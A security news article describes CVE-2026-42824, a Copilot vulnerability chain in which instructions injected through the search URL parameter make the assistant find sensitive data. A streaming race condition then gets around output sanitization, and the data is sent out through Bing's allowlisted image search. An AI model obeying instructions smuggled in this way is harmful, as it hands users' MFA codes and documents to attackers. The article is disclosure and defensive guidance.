CVE-2026-42824 Grants 1-Click Data Theft via M365 Copilot

On June 15, 2026, Varonis Threat Labs detailed SearchLeak, a critical vulnerability chain in Microsoft 365 Copilot Enterprise Search. Tracked as CVE-2026-42824, the exploit allows attackers to extract sensitive corporate data, including multi-factor authentication codes and internal documents, requiring only a single click on a malicious URL. Microsoft applied a backend mitigation for the flaw in early June, requiring no manual updates from enterprise administrators.

The Three-Stage Attack Architecture

The exploit relies on a novel parameter-to-prompt injection combined with standard web security flaws. The initial vector exploits the q parameter in the Copilot search endpoint. Instead of acting as a standard search query, the system interprets this parameter as a direct instruction, allowing attackers to command the AI to locate specific sensitive assets.

To bypass output sanitization, the attack triggers an HTML rendering race condition. Microsoft wraps Copilot outputs in code blocks to neutralize malicious markup. Because the response streams to the browser, raw HTML renders momentarily before the guardrails finish processing. If the payload includes an image tag, the browser executes the source request immediately.

The final exfiltration step exploits Bing’s “Search by Image” feature. Attackers append the stolen data to an image URL pointing to the Bing domain. Since this domain is allowlisted in the Copilot page’s Content Security Policy, the browser permits the request. Bing’s backend then executes a server-side request forgery, fetching the nonexistent image from the attacker’s server and writing the stolen data into their logs.

Vulnerability Scope and Scoring

The National Vulnerability Database assigned CVE-2026-42824 a severity score of 7.5, higher than Microsoft’s internal 6.5 rating. The severity stems from the low friction of the attack and the high value of the targeted data.

Attackers leverage legitimate Microsoft domains to host the malicious payloads, effectively bypassing standard URL filtering and anti-phishing layers. Because the exploit triggers without the victim needing to type a prompt or authorize a new application, the success rate is notably higher than traditional phishing campaigns. This incident highlights the growing necessity for robust defenses against prompt injection at the parameter level.

If you deploy a secure Microsoft 365 Copilot implementation, audit your legacy data structures and user access permissions. Copilot indexes and surfaces any file the user has permission to view, meaning overshared internal documents exponentially increase the blast radius of 1-click vulnerabilities. Restricting lateral data access limits what AI-driven exploits can extract.